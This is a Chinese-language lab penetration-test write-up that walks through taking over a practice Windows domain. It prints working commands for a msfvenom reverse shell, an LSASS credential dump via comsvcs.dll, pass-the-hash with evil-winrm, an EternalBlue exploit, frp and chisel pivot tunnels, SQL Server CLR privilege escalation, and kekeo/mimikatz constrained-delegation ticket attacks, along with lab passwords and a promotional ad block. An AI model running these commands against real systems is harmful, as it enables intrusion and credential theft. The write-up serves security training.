渗透实战：内网域渗透

前言

本文记录了一次针对具有二层内网的域环境进行渗透测试的过程，文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了 msf、CobaltStrike、frp、chisel、SharpSQLTools 等工具，最后通过约束委派拿下了域控。其间运用了很多小工具，文章较长，下面开始此次渗透长途之旅。

网络拓扑如下：

web 服务器

先来波端口扫描：

直接发现了内网的 ip，这里需要提前说明一点，由于靶场搭建的问题，weblogic 只在 10.10.20.12 这个 ip 上才能解析，所以需要调整下 ip 设置，等做完 weblogic 后我们在改回 192 段。

【一>所有资源获取<一】1、200 份很多已经买不到的绝版电子书 2、30G 安全大厂内部的视频资料 3、100 份 src 文档 4、常见安全面试题 5、ctf 大赛经典题目解析 6、全套工具包

看到了 weblogic 的版本，查找下 exp，顺手先来一波 smb 信息收集。

smb 信息收集

smbmap -H 10.10.20.12

smbclient -N -L //10.10.20.12

enum4linux -a 10.10.20.12

rpcclient -U '' 10.10.20.12

smbclient -U '' -L \\10.10.20.12

weblogic 漏洞利用

知道了 weblogic 的具体版本，可以直接去查询漏洞，也可以用工具自动扫描下；

这里直接用 CVE 的漏洞来打一波；

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.20.4 LPORT=1234 -f psh-cmd > exploit.ps1

# use exploit/multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
# set lhost 10.10.20.4
# set lport 1234
# exploit

迁移下进程，开始抓密码；

爆破一波，原来是个弱口令；

接下来换成 CS 更方便；

./teamserver 192.168.223.138 123456

java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar

信息收集一波；

weblogic 数据解密

在介绍下用注册表抓取 hash 的方法；

抓取成功后拖回本地；

在本地解密；

这里有了 hash 之后，尝试下不用 msf 和 cs 来渗透；

evil-winrm -u administrator -H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165

get-process -name lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\temp\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full
ls C:\windows\temp\lsass.dmp
download C:\windows\temp\lsass.dmp

lsass.dmp重命名为weblogic.dmp

pypykatz lsa minidump weblogic.dmp -o weblogic.txt

并没有发现预想中存在的密码，所以下面换个其他的方法；

解密工具可以解密了；

至此，web 服务器算是搞定了，下面开始个人主机的渗透。

个人主机

永恒之蓝利用

进入内网，个人主机已经无法直接出网了，需要搭建代理。

frp 代理

服务端

[common]bind_addr =192.168.223.138bind_port =7000token = Xa3BJf2l5enmN6Z7A8mv[socks5]type = tcpremote_port =7777plugin = socks5

客户端

[common]server_addr = 192.168.223.138server_port = 7000token = Xa3BJf2l5enmN6Z7A8mv[plugin_socks]type = tcpremote_port = 7777plugin = socks5

proxychains nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 10.10.20.7

这里还可以尝试下用 chisel；

./chisel server -p 8000 --reverse

./chisel client 192.168.223.138:8000 R:8100:socks

在 kali 里设置好代理配置；

proxychains nmap --script smb-vuln* -p 445 -sT -Pn 10.10.20.7 -vvv

很明显了，永恒之蓝；这里还是用 frp 代理，通过 msf 来方便点。

msf6 > setg Proxies socks5:192.168.223.138:7777msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 > set payload windows/x64/meterpreter/bind_tcpmsf6 > set rhost 10.10.20.7msf6 > run

成功拿下个人主机，照例先抓下密码；

这里在介绍另一种抓取密码的思路，在目标机抓取后拿回本地来解密分析，在某些场合下会有奇效；

取回本地，minidump 方式解开

查看结果；

为了后续方便，我们可以用 CobaltStrike 来继续，虽然 msf 和 CS 会话可以互通，但我还是习惯直接种马后使用。这里 web 服务器已经提前在 CS 上反弹好了，精华在于 CS 的中转功能。

因为此 Win7 不出网，随后只能通过 CobaltStrike 设置中转：

先创建中转监听器：

生成木马：

利用 msf 上传并运行木马后机器上线；

信息收集一波；

可以看到个人主机后面还有 2 台机器，分别是域控服务器和数据库服务器。在进行下一步渗透之前，先需要把二级代理搭建好。

二级代理搭建

先看看 frp 如何搭建二级代理；

kali 上配置服务端；

web 服务器上配置；（一个服务端，一个客户端）

个人主机上配置客户端；

扫描测试下；

在用 chisel 搭建一个 2 级代理；

kali 上配置服务端；

web 服务器上配置客户端和服务端；

个人主机上配置客户端；

扫描测试下；

proxychains nmap -sC -sV -F -sT -Pn 10.10.10.18 -vvv

数据库服务器

这里先借助 bloodhound 来分析下域环境，以确定下一步的渗透思路，具体的安装及使用这里就不赘述了，我之前的文章有过详细介绍。

到达域管理员的最短路径；

用户：redteam.red/sqlserver 允许委托 OWA 的 cifs 服务（DC 控制器）

至此有了后续基本的渗透思路，就是通过委派攻击拿下域控，下面开始逐步实施；

根据之前端口扫描的结果，做下信息收集；

结合我们已经取得的个人主机控制权，首先当前进程是没有域管的，所以暂且放弃令牌窃取：

这里用到了约束委派攻击的知识，简单来说，在 Windows 系统中，普通用户的属性中没有委派（Delegation）这个选项卡，只有服务账号、主机账号才有。服务账号（Service Account），域内用户的一种类型，服务器运行服务时所用的账号，将服务运行起来并加入域。例如 MS SQL Server 在安装时，会在域内自动注册服务账号 SqlServiceAccount，这类账号不能用于交互式登录。（更具体知识要自己补一下）

由于我们已经拿到了一个域用户的账户密码，尝试查找约束委派的用户：

AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

sqlserver 的用户是被设置了约束委派，但还需要密码；之前知道 1433 是开放的，爆破一波试试；

这样就可以执行 xp_cmdshell 命令了；

发现权限很小只是一个普通服务权限，下面开始提权；

使用 SharpSQLTools 开启目标 clr：（要用 Proxifier 挂上代理，就不截图了）

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

然后启用并调用命令：

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

提取成功。

下面用 msf 来进行文件上传；

上传一个 CS 的木马；

然后在用高权限来运行 cs 木马；

成功上线；

抓取下密码；

至此，数据库服务器渗透结束，下面开始对域控的渗透。

域控

经过前面的分析，这里就是纯粹的利用约束委派拿下域控。

1、利用 kekeo 请求该用户的 TGT：

TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi

kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

2、然后使用这张 TGT

(TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi) 获取域机器的 ST：TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red/service:cifs/owa.redteam.red"

3、使用 mimikatz 将 ST2 导入当前会话即可，运行 mimikatz 进行 ptt：

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

成功拿到域控权限；